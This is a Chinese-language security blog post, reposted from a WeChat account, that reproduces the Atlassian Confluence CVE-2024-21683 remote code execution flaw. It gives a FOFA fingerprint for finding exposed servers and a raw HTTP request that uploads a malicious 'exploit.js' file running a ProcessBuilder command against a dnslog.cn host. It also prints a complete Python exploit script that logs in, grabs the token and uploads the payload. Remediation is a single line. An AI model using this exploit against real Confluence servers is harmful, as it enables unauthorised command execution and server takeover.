狗屎运~Atlassian Confluence CVE-2024-21683 RCE漏洞复现(附EXP)

admin 2024年5月25日01:05:17评论24 views字数 5186阅读17分17秒阅读模式
声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。

现在只对常读和星标的公众号才展示大图推送,建议大家把阿无安全设为星标”,否则可能看不到了

0x01 前言

Confluence是Atlassian公司研发的一个专业的企业知识管理与协同软件。其存在远程命令执行漏洞,攻击者可以通过该漏洞获取服务器权限。

狗屎运~Atlassian Confluence CVE-2024-21683 RCE漏洞复现(附EXP)

0x02 漏洞影响

影响版本

Confluence Data Center = 8.9.08.8.0 <= Confluence Data Center <= 8.8.18.7.1 <= Confluence Data Center <= 8.7.28.6.0 <= Confluence Data Center <= 8.6.28.5.0 <= Confluence Data Center and Server <= 8.5.8 (LTS)8.4.0 <= Confluence Data Center and Server <= 8.4.58.3.0 <= Confluence Data Center and Server <= 8.3.48.2.0 <= Confluence Data Center and Server <= 8.2.48.1.0 <= Confluence Data Center and Server <= 8.1.48.0.0 <= Confluence Data Center and Server <= 8.0.47.20.0 <= Confluence Data Center and Server <= 7.20.37.19.0 <= Confluence Data Center and Server <= 7.19.21 (LTS)7.18.0 <= Confluence Data Center and Server <= 7.18.37.17.0 <= Confluence Data Center and Server <= 7.17.5

0x03 漏洞利用

刚刚好,吃屎的运气~ 关注了好久的终于爆出漏洞了~~

FOFA指纹:icon_hash="-305179312"界面是这个酱紫

狗屎运~Atlassian Confluence CVE-2024-21683 RCE漏洞复现(附EXP)

当然是有前提条件,需要有个账号:
其他数据包就不放了,执行github上的脚本命令会直接挂到burp就能看到

POST /admin/plugins/newcode/addlanguage.action HTTP/2Host: ipUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Accept-Encoding: gzip, deflateAccept: */*Connection: keep-aliveContent-Length: 372Content-Type: multipart/form-data; boundary=f6dae662e22371daece5ff851b1c4a39

--f6dae662e22371daece5ff851b1c4a39Content-Disposition: form-data; name="newLanguageName"

test--f6dae662e22371daece5ff851b1c4a39Content-Disposition: form-data; name="languageFile"; filename="exploit.js"Content-Type: text/javascript

new java.lang.ProcessBuilder["(java.lang.String[])"](["ping 5hnlyo.dnslog.cn"]).start()--f6dae662e22371daece5ff851b1c4a39--

狗屎运~Atlassian Confluence CVE-2024-21683 RCE漏洞复现(附EXP)

EXP如下:(这里利用github写好的脚本)

import argparseimport os

import requestsfrom bs4 import BeautifulSoup

def GeyAltToken(url, proxy, session):    headers = {        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"    }    alttoken_url = f"{url}/admin/plugins/newcode/configure.action"    resp = session.get(url=alttoken_url, headers=headers, verify=False, proxies=proxy, timeout=20)    if "atlassian-token" in resp.text:        soup = BeautifulSoup(resp.text, 'html.parser')        meta_tag = soup.find('meta', {'id': 'atlassian-token', 'name': 'atlassian-token'})        if meta_tag:            content_value = meta_tag.get('content')            return content_value

        else:            print("Meta tag not found")

def LoginAsAdministrator(session, url, proxy, username, password):    login_url = url + "/dologin.action"    headers = {        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36",        "Content-Type": "application/x-www-form-urlencoded"    }    data = f"os_username={username}&os_password={password}&login=%E7%99%BB%E5%BD%95&os_destination=%2F"    session.post(url=login_url, headers=headers, data=data, proxies=proxy, verify=False, timeout=20)

def DoAuthenticate(session, url, proxy, password, alt_token):    login_url = url + "/doauthenticate.action"    headers = {        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36",        "Content-Type": "application/x-www-form-urlencoded"    }    data = f"atl_token={alt_token}&password={password}&authenticate=%E7%A1%AE%E8%AE%A4&destination=/admin/viewgeneralconfig.action"    session.post(url=login_url, headers=headers, data=data, proxies=proxy, verify=False, timeout=20)def UploadEvilJsFile(session, url, proxy, jsFilename, jsFileContent, alt_token):    url = f"{url}/admin/plugins/newcode/addlanguage.action"    data = {        "atl_token": alt_token,        "newLanguageName": "test"    }    files = {        "languageFile": (        jsFilename, jsFileContent, "text/javascript")    }    headers = {        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"    }    session.post(url, headers=headers, data=data, files=files, verify=False, proxies=proxy, timeout=20)

def ParseArgs():    parser = argparse.ArgumentParser(description="CVE-2024-21683-RCE")    parser.add_argument("-u", "--url", type=str, help="target url to check, eg: http://192.168.198.1:8090", required=True)    parser.add_argument("-p", "--proxy", type=str, default="http://127.0.0.1:8083", help="proxy url, eg: http://127.0.0.1:8083", required=False)    parser.add_argument("-au", "--admin-username", type=str, help="The username of the user who is in the Administrators group", required=True)    parser.add_argument("-ap", "--admin-password", type=str, help="The password of the user who is in the Administrators group", required=True)    parser.add_argument("-f", "--file", type=str, help="exploit file", default="exploit.js", required=True)    parser.add_argument("-n", "--name", type=str, help="newLanguageName", default="test", required=True)    return parser.parse_args()

if __name__ == '__main__':    args = ParseArgs()    if not args.proxy:        proxy = {}    else:        proxy = {            "http": args.proxy,            "https": args.proxy        }    session = requests.session()    jsfn = os.path.basename(args.file)    jsfc = open(args.file, "r", encoding="utf-8").read()    LoginAsAdministrator(session, args.url.strip("/"), proxy, args.admin_username, args.admin_password)    alt_token = GeyAltToken(args.url.strip("/"), proxy, session)    DoAuthenticate(session, args.url.strip("/"), proxy, args.admin_username, alt_token)    UploadEvilJsFile(session, args.url.strip("/"), proxy, jsfn, jsfc, alt_token)

详情可以去github看

https://github.com/W01fh4cker/CVE-2024-21683-RCEhttps://realalphaman.substack.com/p/quick-note-about-cve-2024-21683-authenticated

狗屎运~Atlassian Confluence CVE-2024-21683 RCE漏洞复现(附EXP)

0x04 修复方案

请升级最新版本。 

原文始发于微信公众号(阿无安全):狗屎运~Atlassian Confluence CVE-2024-21683 RCE漏洞复现(附EXP)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月25日01:05:17
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   狗屎运~Atlassian Confluence CVE-2024-21683 RCE漏洞复现(附EXP)https://cn-sec.com/archives/2776534.html

发表评论

匿名网友 填写信息